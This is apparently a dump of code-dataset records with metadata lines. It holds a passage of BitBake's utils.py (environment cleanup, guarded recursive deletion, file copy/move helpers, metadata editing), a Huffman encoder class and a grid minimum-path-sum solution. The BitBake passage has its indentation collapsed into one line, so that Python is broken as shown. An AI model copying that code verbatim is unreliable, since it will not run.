(IOError, OSError): pass fcntl.flock(lf.fileno(), fcntl.LOCK_UN) lf.close() def md5_file(filename): """ Return the hex string representation of the MD5 checksum of filename. 
""" import hashlib, mmap with open(filename, "rb") as f: m = hashlib.md5() try: with mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ) as mm: for chunk in iter(lambda: mm.read(8192), b''): m.update(chunk) except ValueError: # You can't mmap() an empty file so silence this exception pass return m.hexdigest() def sha256_file(filename): """ Return the hex string representation of the 256-bit SHA checksum of filename. """ import hashlib s = hashlib.sha256() with open(filename, "rb") as f: for line in f: s.update(line) return s.hexdigest() def sha1_file(filename): """ Return the hex string representation of the SHA1 checksum of the filename """ import hashlib s = hashlib.sha1() with open(filename, "rb") as f: for line in f: s.update(line) return s.hexdigest() def preserved_envvars_exported(): """Variables which are taken from the environment and placed in and exported from the metadata""" return [ 'BB_TASKHASH', 'HOME', 'LOGNAME', 'PATH', 'PWD', 'SHELL', 'TERM', 'USER', 'LC_ALL', 'BBSERVER', ] def preserved_envvars(): """Variables which are taken from the environment and placed in the metadata""" v = [ 'BBPATH', 'BB_PRESERVE_ENV', 'BB_ENV_WHITELIST', 'BB_ENV_EXTRAWHITE', ] return v + preserved_envvars_exported() def filter_environment(good_vars): """ Create a pristine environment for bitbake. This will remove variables that are not known and may influence the build in a negative way. """ removed_vars = {} for key in list(os.environ): if key in good_vars: continue removed_vars[key] = os.environ[key] del os.environ[key] # If we spawn a python process, we need to have a UTF-8 locale, else python's file # access methods will use ascii. You can't change that mode once the interpreter is # started so we have to ensure a locale is set. Ideally we'd use C.UTF-8 but not all # distros support that and we need to set something. 
os.environ["LC_ALL"] = "en_US.UTF-8" if removed_vars: logger.debug(1, "Removed the following variables from the environment: %s", ", ".join(removed_vars.keys())) return removed_vars def approved_variables(): """ Determine and return the list of whitelisted variables which are approved to remain in the environment. """ if 'BB_PRESERVE_ENV' in os.environ: return os.environ.keys() approved = [] if 'BB_ENV_WHITELIST' in os.environ: approved = os.environ['BB_ENV_WHITELIST'].split() approved.extend(['BB_ENV_WHITELIST']) else: approved = preserved_envvars() if 'BB_ENV_EXTRAWHITE' in os.environ: approved.extend(os.environ['BB_ENV_EXTRAWHITE'].split()) if 'BB_ENV_EXTRAWHITE' not in approved: approved.extend(['BB_ENV_EXTRAWHITE']) return approved def clean_environment(): """ Clean up any spurious environment variables. This will remove any variables the user hasn't chosen to preserve. """ if 'BB_PRESERVE_ENV' not in os.environ: good_vars = approved_variables() return filter_environment(good_vars) return {} def empty_environment(): """ Remove all variables from the environment. """ for s in list(os.environ.keys()): os.unsetenv(s) del os.environ[s] def build_environment(d): """ Build an environment from all exported variables. """ import bb.data for var in bb.data.keys(d): export = d.getVarFlag(var, "export", False) if export: os.environ[var] = d.getVar(var) or "" def _check_unsafe_delete_path(path): """ Basic safeguard against recursively deleting something we shouldn't. If it returns True, the caller should raise an exception with an appropriate message. NOTE: This is NOT meant to be a security mechanism - just a guard against silly mistakes with potentially disastrous results. 
""" extra = '' # HOME might not be /home/something, so in case we can get it, check against it homedir = os.environ.get('HOME', '') if homedir: extra = '|%s' % homedir if re.match('(/|//|/home|/home/[^/]*%s)$' % extra, os.path.abspath(path)): return True return False def remove(path, recurse=False): """Equivalent to rm -f or rm -rf""" if not path: return if recurse: for name in glob.glob(path): if _check_unsafe_delete_path(path): raise Exception('bb.utils.remove: called with dangerous path "%s" and recurse=True, refusing to delete!' % path) # shutil.rmtree(name) would be ideal but its too slow subprocess.check_call(['rm', '-rf'] + glob.glob(path)) return for name in glob.glob(path): try: os.unlink(name) except OSError as exc: if exc.errno != errno.ENOENT: raise def prunedir(topdir): # Delete everything reachable from the directory named in 'topdir'. # CAUTION: This is dangerous! if _check_unsafe_delete_path(topdir): raise Exception('bb.utils.prunedir: called with dangerous path "%s", refusing to delete!' % topdir) remove(topdir, recurse=True) # # Could also use return re.compile("(%s)" % "|".join(map(re.escape, suffixes))).sub(lambda mo: "", var) # but thats possibly insane and suffixes is probably going to be small # def prune_suffix(var, suffixes, d): # See if var ends with any of the suffixes listed and # remove it if found for suffix in suffixes: if suffix and var.endswith(suffix): return var[:-len(suffix)] return var def mkdirhier(directory): """Create a directory like 'mkdir -p', but does not complain if directory already exists like os.makedirs """ try: os.makedirs(directory) except OSError as e: if e.errno != errno.EEXIST or not os.path.isdir(directory): raise e def movefile(src, dest, newmtime = None, sstat = None): """Moves a file from src to dest, preserving all permissions and attributes; mtime will be preserved even when moving across filesystems. Returns true on success and false on failure. Move is atomic. 
""" #print "movefile(" + src + "," + dest + "," + str(newmtime) + "," + str(sstat) + ")" try: if not sstat: sstat = os.lstat(src) except Exception as e: print("movefile: Stating source file failed...", e) return None destexists = 1 try: dstat = os.lstat(dest) except: dstat = os.lstat(os.path.dirname(dest)) destexists = 0 if destexists: if stat.S_ISLNK(dstat[stat.ST_MODE]): try: os.unlink(dest) destexists = 0 except Exception as e: pass if stat.S_ISLNK(sstat[stat.ST_MODE]): try: target = os.readlink(src) if destexists and not stat.S_ISDIR(dstat[stat.ST_MODE]): os.unlink(dest) os.symlink(target, dest) #os.lchown(dest,sstat[stat.ST_UID],sstat[stat.ST_GID]) os.unlink(src) return os.lstat(dest) except Exception as e: print("movefile: failed to properly create symlink:", dest, "->", target, e) return None renamefailed = 1 # os.rename needs to know the dest path ending with file name # so append the file name to a path only if it's a dir specified srcfname = os.path.basename(src) destpath = os.path.join(dest, srcfname) if os.path.isdir(dest) \ else dest if sstat[stat.ST_DEV] == dstat[stat.ST_DEV]: try: os.rename(src, destpath) renamefailed = 0 except Exception as e: if e[0] != errno.EXDEV: # Some random error. print("movefile: Failed to move", src, "to", dest, e) return None # Invalid cross-device-link 'bind' mounted or actually Cross-Device if renamefailed: didcopy = 0 if stat.S_ISREG(sstat[stat.ST_MODE]): try: # For safety copy then move it over. 
shutil.copyfile(src, destpath + "#new") os.rename(destpath + "#new", destpath) didcopy = 1 except Exception as e: print('movefile: copy', src, '->', dest, 'failed.', e) return None else: #we don't yet handle special, so we need to fall back to /bin/mv a = getstatusoutput("/bin/mv -f " + "'" + src + "' '" + dest + "'") if a[0] != 0: print("movefile: Failed to move special file:" + src + "' to '" + dest + "'", a) return None # failure try: if didcopy: os.lchown(destpath, sstat[stat.ST_UID], sstat[stat.ST_GID]) os.chmod(destpath, stat.S_IMODE(sstat[stat.ST_MODE])) # Sticky is reset on chown os.unlink(src) except Exception as e: print("movefile: Failed to chown/chmod/unlink", dest, e) return None if newmtime: os.utime(destpath, (newmtime, newmtime)) else: os.utime(destpath, (sstat[stat.ST_ATIME], sstat[stat.ST_MTIME])) newmtime = sstat[stat.ST_MTIME] return newmtime def copyfile(src, dest, newmtime = None, sstat = None): """ Copies a file from src to dest, preserving all permissions and attributes; mtime will be preserved even when moving across filesystems. Returns true on success and false on failure. 
""" #print "copyfile(" + src + "," + dest + "," + str(newmtime) + "," + str(sstat) + ")" try: if not sstat: sstat = os.lstat(src) except Exception as e: logger.warning("copyfile: stat of %s failed (%s)" % (src, e)) return False destexists = 1 try: dstat = os.lstat(dest) except: dstat = os.lstat(os.path.dirname(dest)) destexists = 0 if destexists: if stat.S_ISLNK(dstat[stat.ST_MODE]): try: os.unlink(dest) destexists = 0 except Exception as e: pass if stat.S_ISLNK(sstat[stat.ST_MODE]): try: target = os.readlink(src) if destexists and not stat.S_ISDIR(dstat[stat.ST_MODE]): os.unlink(dest) os.symlink(target, dest) #os.lchown(dest,sstat[stat.ST_UID],sstat[stat.ST_GID]) return os.lstat(dest) except Exception as e: logger.warning("copyfile: failed to create symlink %s to %s (%s)" % (dest, target, e)) return False if stat.S_ISREG(sstat[stat.ST_MODE]): try: srcchown = False if not os.access(src, os.R_OK): # Make sure we can read it srcchown = True os.chmod(src, sstat[stat.ST_MODE] | stat.S_IRUSR) # For safety copy then move it over. 
shutil.copyfile(src, dest + "#new") os.rename(dest + "#new", dest) except Exception as e: logger.warning("copyfile: copy %s to %s failed (%s)" % (src, dest, e)) return False finally: if srcchown: os.chmod(src, sstat[stat.ST_MODE]) os.utime(src, (sstat[stat.ST_ATIME], sstat[stat.ST_MTIME])) else: #we don't yet handle special, so we need to fall back to /bin/mv a = getstatusoutput("/bin/cp -f " + "'" + src + "' '" + dest + "'") if a[0] != 0: logger.warning("copyfile: failed to copy special file %s to %s (%s)" % (src, dest, a)) return False # failure try: os.lchown(dest, sstat[stat.ST_UID], sstat[stat.ST_GID]) os.chmod(dest, stat.S_IMODE(sstat[stat.ST_MODE])) # Sticky is reset on chown except Exception as e: logger.warning("copyfile: failed to chown/chmod %s (%s)" % (dest, e)) return False if newmtime: os.utime(dest, (newmtime, newmtime)) else: os.utime(dest, (sstat[stat.ST_ATIME], sstat[stat.ST_MTIME])) newmtime = sstat[stat.ST_MTIME] return newmtime def break_hardlinks(src, sstat = None): """ Ensures src is the only hardlink to this file. Other hardlinks, if any, are not affected (other than in their st_nlink value, of course). Returns true on success and false on failure. """ try: if not sstat: sstat = os.lstat(src) except Exception as e: logger.warning("break_hardlinks: stat of %s failed (%s)" % (src, e)) return False if sstat[stat.ST_NLINK] == 1: return True return copyfile(src, src, sstat=sstat) def which(path, item, direction = 0, history = False, executable=False): """ Locate `item` in the list of paths `path` (colon separated string like $PATH). If `direction` is non-zero then the list is reversed. If `history` is True then the list of candidates also returned as result,history. If `executable` is True then the candidate has to be an executable file, otherwise the candidate simply has to exist. 
""" if executable: is_candidate = lambda p: os.path.isfile(p) and os.access(p, os.X_OK) else: is_candidate = lambda p: os.path.exists(p) hist = [] paths = (path or "").split(':') if direction != 0: paths.reverse() for p in paths: next = os.path.join(p, item) hist.append(next) if is_candidate(next): if not os.path.isabs(next): next = os.path.abspath(next) if history: return next, hist return next if history: return "", hist return "" def to_boolean(string, default=None): if not string: return default normalized = string.lower() if normalized in ("y", "yes", "1", "true"): return True elif normalized in ("n", "no", "0", "false"): return False else: raise ValueError("Invalid value for to_boolean: %s" % string) def contains(variable, checkvalues, truevalue, falsevalue, d): """Check if a variable contains all the values specified. Arguments: variable -- the variable name. This will be fetched and expanded (using d.getVar(variable)) and then split into a set(). checkvalues -- if this is a string it is split on whitespace into a set(), otherwise coerced directly into a set(). truevalue -- the value to return if checkvalues is a subset of variable. falsevalue -- the value to return if variable is empty or if checkvalues is not a subset of variable. d -- the data store. """ val = d.getVar(variable) if not val: return falsevalue val = set(val.split()) if isinstance(checkvalues, str): checkvalues = set(checkvalues.split()) else: checkvalues = set(checkvalues) if checkvalues.issubset(val): return truevalue return falsevalue def contains_any(variable, checkvalues, truevalue, falsevalue, d): val = d.getVar(variable) if not val: return falsevalue val = set(val.split()) if isinstance(checkvalues, str): checkvalues = set(checkvalues.split()) else: checkvalues = set(checkvalues) if checkvalues & val: return truevalue return falsevalue def filter(variable, checkvalues, d): """Return all words in the variable that are present in the checkvalues. 
Arguments: variable -- the variable name. This will be fetched and expanded (using d.getVar(variable)) and then split into a set(). checkvalues -- if this is a string it is split on whitespace into a set(), otherwise coerced directly into a set(). d -- the data store. """ val = d.getVar(variable) if not val: return '' val = set(val.split()) if isinstance(checkvalues, str): checkvalues = set(checkvalues.split()) else: checkvalues = set(checkvalues) return ' '.join(sorted(checkvalues & val)) def cpu_count(): return multiprocessing.cpu_count() def nonblockingfd(fd): fcntl.fcntl(fd, fcntl.F_SETFL, fcntl.fcntl(fd, fcntl.F_GETFL) | os.O_NONBLOCK) def process_profilelog(fn, pout = None): # Either call with a list of filenames and set pout or a filename and optionally pout. if not pout: pout = fn + '.processed' pout = open(pout, 'w') import pstats if isinstance(fn, list): p = pstats.Stats(*fn, stream=pout) else: p = pstats.Stats(fn, stream=pout) p.sort_stats('time') p.print_stats() p.print_callers() p.sort_stats('cumulative') p.print_stats() pout.flush() pout.close() # # Was present to work around multiprocessing pool bugs in python < 2.7.3 # def multiprocessingpool(*args, **kwargs): import multiprocessing.pool #import multiprocessing.util #multiprocessing.util.log_to_stderr(10) # Deal with a multiprocessing bug where signals to the processes would be delayed until the work # completes. Putting in a timeout means the signals (like SIGINT/SIGTERM) get processed. 
def wrapper(func): def wrap(self, timeout=None): return func(self, timeout=timeout if timeout is not None else 1e100) return wrap multiprocessing.pool.IMapIterator.next = wrapper(multiprocessing.pool.IMapIterator.next) return multiprocessing.Pool(*args, **kwargs) def exec_flat_python_func(func, *args, **kwargs): """Execute a flat python function (defined with def funcname(args):...)""" # Prepare a small piece of python code which calls the requested function # To do this we need to prepare two things - a set of variables we can use to pass # the values of arguments into the calling function, and the list of arguments for # the function being called context = {} funcargs = [] # Handle unnamed arguments aidx = 1 for arg in args: argname = 'arg_%s' % aidx context[argname] = arg funcargs.append(argname) aidx += 1 # Handle keyword arguments context.update(kwargs) funcargs.extend(['%s=%s' % (arg, arg) for arg in kwargs.keys()]) code = 'retval = %s(%s)' % (func, ', '.join(funcargs)) comp = bb.utils.better_compile(code, '<string>', '<string>') bb.utils.better_exec(comp, context, code, '<string>') return context['retval'] def edit_metadata(meta_lines, variables, varfunc, match_overrides=False): """Edit lines from a recipe or config file and modify one or more specified variable values set in the file using a specified callback function. Lines are expected to have trailing newlines. Parameters: meta_lines: lines from the file; can be a list or an iterable (e.g. file pointer) variables: a list of variable names to look for. Functions may also be specified, but must be specified with '()' at the end of the name. Note that the function doesn't have any intrinsic understanding of _append, _prepend, _remove, or overrides, so these are considered as part of the name. These values go into a regular expression, so regular expression syntax is allowed. varfunc: callback function called for every variable matching one of the entries in the variables parameter. 
The function should take four arguments: varname: name of variable matched origvalue: current value in file op: the operator (e.g. '+=') newlines: list of lines up to this point. You can use this to prepend lines before this variable setting if you wish. and should return a four-element tuple: newvalue: new value to substitute in, or None to drop the variable setting entirely. (If the removal results in two consecutive blank lines, one of the blank lines will also be dropped). newop: the operator to use - if you specify None here, the original operation will be used. indent: number of spaces to indent multi-line entries, or -1 to indent up to the level of the assignment and opening quote, or a string to use as the indent. minbreak: True to allow the first element of a multi-line value to continue on the same line as the assignment, False to indent before the first element. To clarify, if you wish not to change the value, then you would return like this: return origvalue, None, 0, True match_overrides: True to match items with _overrides on the end, False otherwise Returns a tuple: updated: True if changes were made, False otherwise. newlines: Lines after processing """ var_res = {} if match_overrides: override_re = r'(_[a-zA-Z0-9-_$(){}]+)?' 
else: override_re = '' for var in variables: if var.endswith('()'): var_res[var] = re.compile(r'^(%s%s)[ \\t]*\([ \\t]*\)[ \\t]*{' % (var[:-2].rstrip(), override_re)) else: var_res[var] = re.compile(r'^(%s%s)[ \\t]*[?+:.]*=[+.]*[ \\t]*(["\'])' % (var, override_re)) updated = False varset_start = '' varlines = [] newlines = [] in_var = None full_value = '' var_end = '' def handle_var_end(): prerun_newlines = newlines[:] op = varset_start[len(in_var):].strip() (newvalue, newop, indent, minbreak) = varfunc(in_var, full_value, op, newlines) changed = (prerun_newlines != newlines) if newvalue is None: # Drop the value return True elif newvalue != full_value or (newop not in [None, op]): if newop not in [None, op]: # Callback changed the operator varset_new = "%s %s" % (in_var, newop) else: varset_new = varset_start if isinstance(indent, int): if indent == -1: indentspc = ' ' * (len(varset_new) + 2) else: indentspc = ' ' * indent else: indentspc = indent if in_var.endswith('()'): # A function definition if isinstance(newvalue, list): newlines.append('%s {\n%s%s\n}\n' % (varset_new, indentspc, ('\n%s' % indentspc).join(newvalue))) else: if not newvalue.startswith('\n'): newvalue = '\n' + newvalue if not newvalue.endswith('\n'): newvalue = newvalue + '\n' newlines.append('%s {%s}\n' % (varset_new, newvalue)) else: # Normal variable if isinstance(newvalue, list): if not newvalue: # Empty list -> empty string newlines.append('%s ""\n' % varset_new) elif minbreak: # First item on first line if len(newvalue) == 1: newlines.append('%s "%s"\n' % (varset_new, newvalue[0])) else: newlines.append('%s "%s \\\n' % (varset_new, newvalue[0])) for item in newvalue[1:]: newlines.append('%s%s \\\n' % (indentspc, item)) newlines.append('%s"\n' % indentspc) else: # No item on first line newlines.append('%s " \\\n' % varset_new) for item in newvalue: newlines.append('%s%s \\\n' % (indentspc, item)) newlines.append('%s"\n' % indentspc) else: newlines.append('%s "%s"\n' % (varset_new, 
newvalue)) return True else: # Put the old lines back where they were newlines.extend(varlines) # If newlines was touched by the function, we'll need to return True return changed checkspc = False for line in meta_lines: if in_var: value = line.rstrip() varlines.append(line) if in_var.endswith('()'): full_value += '\n' + value else: full_value += value[:-1] if value.endswith(var_end): if in_var.endswith('()'): if full_value.count('{') - full_value.count('}') >= 0: continue full_value = full_value[:-1] if handle_var_end(): updated = True checkspc = True in_var = None else: skip = False for (varname, var_re) in var_res.items(): res = var_re.match(line) if res: isfunc = varname.endswith('()') if isfunc: splitvalue = line.split('{', 1) var_end = '}' else: var_end = res.groups()[-1] splitvalue = line.split(var_end, 1) varset_start = splitvalue[0].rstrip() value = splitvalue[1].rstrip() if not isfunc and value.endswith('\\'): value = value[:-1] full_value = value varlines = [line] in_var = res.group(1) if isfunc: in_var += '()' if value.endswith(var_end): full_value = full_value[:-1] if handle_var_end(): updated = True checkspc = True in_var = None skip = True break if not skip: if checkspc: checkspc = False if newlines and newlines[-1] == '\n' and line == '\n': # Squash blank line if there are two consecutive blanks after a removal continue newlines.append(line) return (updated, newlines) def edit_metadata_file(meta_file, variables, varfunc): """Edit a recipe or config file and modify one or more specified variable values set in the file using a specified callback function. The file is only written to if the value(s) actually change. This is basically the file version of edit_metadata(), see that function's description for parameter/usage information. Returns True if the file was written to, False otherwise. 
""" with open(meta_file, 'r') as f: (updated, newlines) = edit_metadata(f, variables, varfunc) if updated: with open(meta_file, 'w') as f: f.writelines(newlines) return updated def edit_bblayers_conf(bblayers_conf, add, remove, edit_cb=None): """Edit bblayers.conf, adding and/or removing layers Parameters: bblayers_conf: path to bblayers.conf file to edit add: layer path (or list of layer paths) to add; None or empty list to add nothing remove: layer path (or list of layer paths) to remove; None or empty list to remove nothing edit_cb: optional callback function that will be called after processing adds/removes once per existing entry. Returns a tuple: notadded: list of layers specified to be added but weren't (because they were already in the list) notremoved: list of layers that were specified to be removed but weren't (because they weren't in the list) """ import fnmatch def remove_trailing_sep(pth): if pth and pth[-1] == os.sep: pth = pth[:-1] return pth approved = bb.utils.approved_variables() def canonicalise_path(pth): pth = remove_trailing_sep(pth) if 'HOME' in approved and '~' in pth: pth = os.path.expanduser(pth) return pth def layerlist_param(value): if not value: return [] elif isinstance(value, list): return [remove_trailing_sep(x) for x in value] else: return [remove_trailing_sep(value)] addlayers = layerlist_param(add) removelayers = layerlist_param(remove) # Need to use a list here because we can't set non-local variables from a callback in python 2.x bblayercalls = [] removed = [] plusequals = False orig_bblayers = [] def handle_bblayers_firstpass(varname, origvalue, op, newlines): bblayercalls.append(op) if op == '=': del orig_bblayers[:] orig_bblayers.extend([canonicalise_path(x) for x in origvalue.split()]) return (origvalue, None, 2, False) def handle_bblayers(varname, origvalue, op, newlines): updated = False bblayers = [remove_trailing_sep(x) for x in origvalue.split()] if removelayers: for removelayer in removelayers: for layer in bblayers: 
if fnmatch.fnmatch(canonicalise_path(layer), canonicalise_path(removelayer)): updated = True bblayers.remove(layer) removed.append(removelayer) break if addlayers and not plusequals: for addlayer in addlayers: if addlayer not in bblayers: updated = True bblayers.append(addlayer) del addlayers[:] if edit_cb: newlist = [] for layer in bblayers: res = edit_cb(layer, canonicalise_path(layer)) if res != layer: newlist.append(res) updated = True else: newlist.append(layer) bblayers = newlist if updated: if op == '+=' and not bblayers: bblayers = None return (bblayers, None, 2, False) else: return (origvalue, None, 2, False) with open(bblayers_conf, 'r') as f: (_, newlines) = edit_metadata(f, ['BBLAYERS'], handle_bblayers_firstpass) if not bblayercalls: raise Exception('Unable to find BBLAYERS in %s' % bblayers_conf) # Try to do the "smart" thing depending on how the user has laid out # their bblayers.conf file if bblayercalls.count('+=') > 1: plusequals = True removelayers_canon = [canonicalise_path(layer) for layer in removelayers] notadded = [] for layer in addlayers: layer_canon = canonicalise_path(layer) if layer_canon in orig_bblayers and not layer_canon in removelayers_canon: notadded.append(layer) notadded_canon = [canonicalise_path(layer) for layer in notadded] addlayers[:] = [layer for layer in addlayers if canonicalise_path(layer) not in notadded_canon] (updated, newlines) = edit_metadata(newlines, ['BBLAYERS'], handle_bblayers) if addlayers: # Still need to add these for addlayer in addlayers: newlines.append('BBLAYERS += "%s"\n' % addlayer) updated = True if updated: with open(bblayers_conf, 'w') as f: f.writelines(newlines) notremoved = list(set(removelayers) - set(removed)) return (notadded, notremoved) def get_file_layer(filename, d): """Determine the collection (as defined by a layer's layer.conf file) containing the specified file""" collections = (d.getVar('BBFILE_COLLECTIONS') or '').split() collection_res = {} for collection in collections: 
collection_res[collection] = d.getVar('BBFILE_PATTERN_%s' % collection) or '' def path_to_layer(path): # Use longest path so we handle nested layers matchlen = 0 match = None for collection, regex in collection_res.items(): if len(regex) > matchlen and re.match(regex, path): matchlen = len(regex) match = collection return match result = None bbfiles = (d.getVar('BBFILES') or '').split() bbfilesmatch = False for bbfilesentry in bbfiles: if fnmatch.fnmatch(filename, bbfilesentry): bbfilesmatch = True result = path_to_layer(bbfilesentry) if not bbfilesmatch: # Probably a bbclass result = path_to_layer(filename) return result # Constant taken from http://linux.die.net/include/linux/prctl.h PR_SET_PDEATHSIG = 1 class PrCtlError(Exception): pass def signal_on_parent_exit(signame): """ Trigger signame to be sent when the parent process dies """ signum = getattr(signal, signame) # http://linux.die.net/man/2/prctl result = cdll['libc.so.6'].prctl(PR_SET_PDEATHSIG, signum) if result != 0: raise PrCtlError('prctl failed with error code %s' % result) # # Manually call the ioprio syscall. 
We could depend on other libs like psutil # however this gets us enough of what we need to bitbake for now without the # dependency # _unamearch = os.uname()[4] IOPRIO_WHO_PROCESS = 1 IOPRIO_CLASS_SHIFT = 13 def ioprio_set(who, cls, value): NR_ioprio_set = None if _unamearch == "x86_64": NR_ioprio_set = 251 elif _unamearch[0] == "i" and _unamearch[2:3] == "86": NR_ioprio_set = 289 elif _unamearch == "aarch64": NR_ioprio_set = 30 if NR_ioprio_set: ioprio = value | (cls << IOPRIO_CLASS_SHIFT) rc = cdll['libc.so.6'].syscall(NR_ioprio_set, IOPRIO_WHO_PROCESS, who, ioprio) if rc != 0: raise ValueError("Unable to set ioprio, syscall returned %s" % rc) else: bb.warn("Unable to set IO Prio for arch %s" % _unamearch) def set_process_name(name): from ctypes import cdll, byref, create_string_buffer # This is nice to have for debugging, not essential try: libc = cdll.LoadLibrary('libc.so.6') buf = create_string_buffer(bytes(name, 'utf-8')) libc.prctl(15, byref(buf), 0, 0, 0) except: pass # export common proxies variables from datastore to environment def export_proxies(d): import os variables = ['http_proxy', 'HTTP_PROXY', 'https_proxy', 'HTTPS_PROXY', 'ftp_proxy', 'FTP_PROXY', 'no_proxy', 'NO_PROXY', 'GIT_PROXY_COMMAND'] exported = False for v in variables: if v in os.environ.keys(): exported = True else: v_proxy = d.getVar(v) if v_proxy is not None: os.environ[v] = v_proxy exported = True return exported def load_plugins(logger, plugins, pluginpath): def load_plugin(name): logger.debug(1, 'Loading plugin %s' % name) spec = importlib.machinery.PathFinder.find_spec(name, path=[pluginpath] ) if spec: return spec.loader.load_module() logger.debug(1, 'Loading plugins from %s...' 
% pluginpath) expanded = (glob.glob(os.path.join(pluginpath, '*' + ext)) for ext in python_extensions) files = itertools.chain.from_iterable(expanded) names = set(os.path.splitext(os.path.basename(fn))[0] for fn in files) for name in names: if name != '__init__': plugin = load_plugin(name) if hasattr(plugin, 'plugin_init'): obj = plugin.plugin_init(plugins) plugins.append(obj or plugin) else: plugins.append(plugin) class LogCatcher(logging.Handler): """Logging handler for collecting logged messages so you can check them later""" def __init__(self): self.messages = [] logging.Handler.__init__(self, logging.WARNING) def emit(self, record): self.messages.append(bb.build.logformatter.format(record)) def contains(self, message): return (message in self.messages)
33.931673
181
0.573518
9c3259e540e7d07de478418013ab2f8954a5e798
3,785
py
Python
module/encodings/huffman/huffman_encoding.py
abraxas767/ezencode
14d870a708c4da1389858f5265c36b930a0e5176
[ "MIT" ]
null
null
null
module/encodings/huffman/huffman_encoding.py
abraxas767/ezencode
14d870a708c4da1389858f5265c36b930a0e5176
[ "MIT" ]
null
null
null
module/encodings/huffman/huffman_encoding.py
abraxas767/ezencode
14d870a708c4da1389858f5265c36b930a0e5176
[ "MIT" ]
null
null
null
from leaf_node import LeafNode
import sys
sys.path.insert(0, "./encodings/")
from abstract_encoding import Encoding


class HuffmanEncoding(Encoding):
    """ This is the implementation of the huffman encoding. """

    # NOTE(review): these are class-level attributes shared by all instances
    # until encode() rebinds them on self; decode() only works on the same
    # object after encode() has been called — confirm this is intended.
    __leafs = []
    __prefix_table = {}

    # generate prefix table and encode accordingly
    def encode(self, data: str) -> str:
        # TODO save the generated prefix table and
        # append it to the compressed result
        if data == '':
            raise ValueError('input cant be empty')
        # reset per-call state before rebuilding the tree
        self.__prefix_table = {}
        self.__leafs = []
        freq = self.__map_frequencies(data)
        sorted_freq = self.__sort_frequencies(freq)
        self.__pair_frequencies(sorted_freq)
        self.__create_prefix_table()
        # concatenate the per-character prefix codes
        res = ""
        for char in data:
            res += self.__prefix_table[char]
        return res

    # receives input data and decodes with help of given prefix table
    def decode(self, data: str) -> str:
        # TODO Get the prefix table from input
        # and decode accordingly
        # reverse the table to be able to access prefixes as keys
        reverse_table = {val: key for key, val in self.__prefix_table.items()}
        res = ""
        tmp = ""
        # prefix-free codes: emit a character as soon as tmp matches a code
        for i in data:
            tmp += i
            if tmp in reverse_table:
                res += reverse_table[tmp]
                tmp = ""
        return res

    # nudge recursive tree generation
    def __create_prefix_table(self) -> None:
        # after __gen_pairs, __leafs holds exactly the tree root
        self.__add_to_prefix_table(self.__leafs[0])

    # generate prefix table entries recursivly
    def __add_to_prefix_table(self, node: object) -> None:
        # leaf nodes (is_numeric False) get a code: walk up to the root
        # collecting the 0/1 edge labels, then reverse the path
        if not node.is_numeric:
            code = ""
            code += str(node.code)
            cursor = node
            while cursor.parent is not None:
                cursor = cursor.parent
                if cursor.code is not None:
                    code += str(cursor.code)
            self.__prefix_table[node.content] = code[::-1]
        # recurse into both children of internal nodes
        if node.child0 is not None and node.child1 is not None:
            self.__add_to_prefix_table(node.child0)
            self.__add_to_prefix_table(node.child1)

    # create leaf nodes
    def __pair_frequencies(self, data: dict) -> None:
        # check if odd
        if len(data) % 2 != 0:
            # create a fill node
            # (zero-probability dummy so leaves can be paired evenly)
            fill_node = LeafNode("xx", 0, False)
            self.__leafs.append(fill_node)
        for i in data.items():
            leaf_node = LeafNode(i[0], i[1], False)
            self.__leafs.append(leaf_node)
        self.__gen_pairs(self.__leafs)

    # recursive tree generation
    def __gen_pairs(self, data: list) -> None:
        # repeatedly merge the two lowest-probability nodes (taken from the
        # tail of the descending-sorted list) into a parent node, then
        # recurse on the new level until a single root remains
        pairs = []
        while len(data) > 0:
            l1 = data[-1]
            del data[-1]
            l2 = data[-1]
            del data[-1]
            pair = LeafNode(l1.content + l2.content, l1.prob + l2.prob, True)
            pair.set_children(l1, l2)
            l1.set_parent(pair)
            l1.set_code(0)
            l2.set_parent(pair)
            l2.set_code(1)
            # odd leftover node is carried up to the next level unchanged
            if len(data) == 1:
                pairs.append(data[0])
                del data[0]
            pairs.append(pair)
        pairs.sort(key=lambda x: x.prob, reverse=True)
        if len(pairs) == 1:
            self.__leafs = pairs
            return
        self.__gen_pairs(pairs)

    # sort given frequencies alphabetically and according to probability
    def __sort_frequencies(self, data: dict) -> dict:
        # sort key is (count, character), ascending
        res = {k: v for k, v in sorted(data.items(), key=lambda item: (item[1], item[0]))}
        return res

    # map characters to frequencies
    def __map_frequencies(self, data: str) -> dict:
        res = {i : data.count(i) for i in set(data)}
        return res
33.495575
90
0.56539
92dcf68e6c97a3a805ae8a3355dc92b478a1a5c0
594
py
Python
minimum-path-sum/minimum-path-sum.py
hyeseonko/LeetCode
48dfc93f1638e13041d8ce1420517a886abbdc77
[ "MIT" ]
2
2021-12-05T14:29:06.000Z
2022-01-01T05:46:13.000Z
minimum-path-sum/minimum-path-sum.py
hyeseonko/LeetCode
48dfc93f1638e13041d8ce1420517a886abbdc77
[ "MIT" ]
null
null
null
minimum-path-sum/minimum-path-sum.py
hyeseonko/LeetCode
48dfc93f1638e13041d8ce1420517a886abbdc77
[ "MIT" ]
null
null
null
class Solution:
    def minPathSum(self, grid: List[List[int]]) -> int:
        """Return the minimum sum of values along a path from the top-left
        to the bottom-right cell of `grid`, moving only right or down.

        Classic dynamic programming: best[r][c] is the cheapest cost to
        reach cell (r, c). The input grid is not modified.
        """
        rows, cols = len(grid), len(grid[0])
        best = [[0] * cols for _ in range(rows)]
        for r in range(rows):
            for c in range(cols):
                cell = grid[r][c]
                if r == 0 and c == 0:
                    # starting cell: no predecessor
                    best[r][c] = cell
                elif r == 0:
                    # first row: can only arrive from the left
                    best[r][c] = cell + best[r][c - 1]
                elif c == 0:
                    # first column: can only arrive from above
                    best[r][c] = cell + best[r - 1][c]
                else:
                    best[r][c] = cell + min(best[r][c - 1], best[r - 1][c])
        return best[rows - 1][cols - 1]
39.6
71
0.451178
b928ec93afb4beed9aa07ca6a042faa5096ea5a0
13,916
py
Python
src/Sephrasto/CharakterAttributeWrapper.py
Ilaris-Tools/Sephrasto
8574a5b45da8ebfa5f69a775066fd3136da1c718
[ "MIT" ]
1
2022-02-02T16:15:59.000Z
2022-02-02T16:15:59.000Z
src/Sephrasto/CharakterAttributeWrapper.py
Ilaris-Tools/Sephrasto
8574a5b45da8ebfa5f69a775066fd3136da1c718
[ "MIT" ]
1
2022-01-14T11:04:19.000Z
2022-01-14T11:04:19.000Z
src/Sephrasto/CharakterAttributeWrapper.py
lukruh/Sephrasto
8574a5b45da8ebfa5f69a775066fd3136da1c718
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*-
"""
